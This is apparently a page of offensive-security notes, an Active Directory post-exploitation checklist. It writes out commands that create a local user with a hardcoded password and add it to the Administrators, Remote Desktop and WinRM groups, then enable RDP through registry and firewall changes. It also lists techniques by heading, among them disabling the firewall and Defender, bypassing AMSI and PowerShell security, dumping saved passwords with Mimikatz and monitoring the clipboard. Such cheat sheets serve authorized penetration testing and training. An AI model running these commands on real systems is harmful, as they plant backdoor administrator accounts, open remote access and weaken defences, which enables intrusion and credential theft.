Post Exploitation
Active Directory Post Exploitation Checklists
RDP Stuff
Add Local Administrator
Create user asuka and add to RDP, Admin, and WinRM.
net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /addEnable RDP Access
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=YesAccess RDP
Defender and Firewall Stuff
Turn Off Firewall
Disable Defender Real Time Monitoring
Bypassing PowerShell Security
Using InviShell - https://github.com/OmerYa/Invisi-Shell
AMSI Bypass
Detection: https://github.com/RythmStick/AMSITrigger
OPSEC with Loader
Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
WADComs
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
Dump Saved Password
Mimikatz
TCP Port Scanner
Ping Sweep
Inveigh
Responder, but in Powershell/C#
MDE Enum
How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges

Or, use this Powershell script.

Reference:
Other Useful Stuff
Last updated
Was this helpful?